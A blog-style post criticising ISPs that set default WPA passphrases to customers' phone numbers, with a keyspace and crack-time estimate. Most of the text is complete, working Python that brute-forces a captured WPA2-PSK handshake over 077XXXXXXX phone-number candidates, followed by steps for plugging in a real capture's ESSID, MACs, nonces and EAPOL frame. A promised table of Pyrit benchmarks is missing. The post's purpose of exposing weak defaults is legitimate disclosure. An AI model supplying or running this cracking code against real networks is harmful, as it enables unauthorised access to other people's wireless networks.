There’s something that has worried me greatly ever since my ISP came to install my router upgrade.
I won’t mention names, but certain providers seem to favour setting the WPA-PSK passphrase to the customer’s phone number by default.
I have noticed that the ESSID is sometimes a form of the customer’s surname too.
This is of course dismal security-wise.
Firstly, if I can somehow get the target’s phone number (e.g. by looking it up in the phonebook, DUH), I can probably just guess the passphrase.
Secondly, even if I have no idea what the phone number is, this ‘convention’ for passphrases GREATLY reduces the keyspace, making brute-force attacks not only possible but practical.
Let’s take HOT for example. Their phone-number space is 077-XXX-XXXX. The 077 prefix is fixed, so only seven digits actually vary.
That’s only 10,000,000 possible keys! (The full number, prefix included, is ten characters, so it clears WPA’s eight-character minimum, but the prefix adds nothing to the entropy. An attacker would also try the dashed 077-XXX-XXXX spelling in case that is how the installer typed it, which merely doubles the work.)
The following benchmarks from the Pyrit project paint a pretty bleak picture:
Now I haven’t benchmarked my home system yet, but let’s conservatively say that my Radeon HD 5670 can pull a modest 5k PMKs/s. At that rate I could cover the entire keyspace in 10,000,000 / 5,000 = 2,000 s, about 33 minutes. Statistically speaking, the key is found halfway through on average, so I’d likely hit it in under 17 minutes!
Pretty practical I’d say.
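To make the keyspace argument concrete, here is an added example (my own code, not anything from the provider or from Pyrit) that does the whole offline attack in pure Python: it derives the PMK from a candidate passphrase and the ESSID, expands it to the PTK using the MACs and nonces from a captured four-way handshake, and checks the EAPOL MIC from message 2 of the handshake. It then walks the 077XXXXXXX candidate space. The handshake it tests against is constructed inline (fake MAC addresses, nonces and EAPOL frame, with the MIC computed from a chosen passphrase) so it runs offline; the ESSID `Cohen`, the passphrase `0771234567` and the 5k PMKs/s figure are assumptions for the demo, not measurements. Python's `hashlib` PBKDF2 is much slower than a GPU, so the demo only searches a few hundred candidates around the answer; the arithmetic for the full space is in `seconds_to_exhaust`.

```python
"""Added example: offline WPA2-PSK cracking over a phone-number keyspace."""
import hashlib
import hmac
from typing import Iterable, Optional

# --- WPA2-PSK key derivation (IEEE 802.11i) -----------------------------------

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    This is the expensive step that Pyrit/hashcat push onto the GPU."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512: expand the PMK into the 64-byte PTK. MACs and nonces are each
    sorted so that the AP and the station derive the same key."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for counter in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([counter]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP key MIC: HMAC-SHA1 over the EAPOL-Key frame with its MIC field
    zeroed, truncated to 16 bytes. The KCK is the first 16 bytes of the PTK."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


# --- The reduced keyspace ------------------------------------------------------

def phone_candidates(prefix: str, start: int, stop: int, digits: int = 7,
                     dashed: bool = False) -> Iterable[str]:
    """All passphrases <prefix><digits> for the suffix range [start, stop),
    e.g. 077XXXXXXX. dashed=True yields the 077-XXX-XXXX spelling instead.
    With a 3-digit prefix and 7 digits the result is 10 chars, above WPA's minimum of 8."""
    for n in range(start, stop):
        tail = f"{n:0{digits}d}"
        yield f"{prefix}-{tail[:3]}-{tail[3:]}" if dashed else prefix + tail


def seconds_to_exhaust(keyspace: int, pmks_per_second: float) -> float:
    """Worst-case time to try every key; the expected time is half of this."""
    return keyspace / pmks_per_second


def crack(handshake: dict, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose derived KCK reproduces the captured MIC."""
    for passphrase in candidates:
        pmk = pmk_from_passphrase(passphrase, handshake["ssid"])
        ptk = ptk_from_pmk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                           handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], handshake["eapol"]), handshake["mic"]):
            return passphrase
    return None


# --- Constructed sample handshake (NOT a real capture) ------------------------

def make_demo_handshake(passphrase: str, ssid: str = "Cohen") -> dict:
    """Build a fake message-2 handshake whose MIC is valid for `passphrase`.
    MACs, nonces and the EAPOL frame are made up; only their shape is realistic."""
    ap_mac, sta_mac = bytes.fromhex("0200000000aa"), bytes.fromhex("0200000000bb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    eapol = (b"\x01\x03\x00\x5f"          # 802.1X: version 1, type 3 (EAPOL-Key), length 95
             + b"\x02"                     # descriptor type: RSN
             + b"\x01\x0a"                 # key info: MIC set, pairwise, HMAC-SHA1 version
             + b"\x00\x00"                 # key length
             + b"\x00" * 7 + b"\x01"       # replay counter
             + snonce                      # station nonce
             + bytes(16) + bytes(8) + bytes(8)  # key IV, RSC, key ID
             + bytes(16)                   # MIC field, zeroed for the MIC computation
             + b"\x00\x00")                # key data length
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(ptk[:16], eapol)}


if __name__ == "__main__":
    print("full 077 keyspace at 5k PMK/s: %.0f s" % seconds_to_exhaust(10_000_000, 5_000))
    demo = make_demo_handshake("0771234567")
    # Only a small window around the answer, since CPU PBKDF2 is slow.
    print("recovered:", crack(demo, phone_candidates("077", 1_234_400, 1_234_700)))
```

Feeding a real capture means replacing the fields of the handshake dict with the ESSID, the two MACs, ANonce (message 1), SNonce (message 2) and the message-2 EAPOL-Key frame with its MIC zeroed; the derivation code does not change. The point of the example is that nothing here is hard: the only cost is PBKDF2, and a seven-digit keyspace simply does not buy enough of it.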
So basically, providers; please stop doing stupid things like this!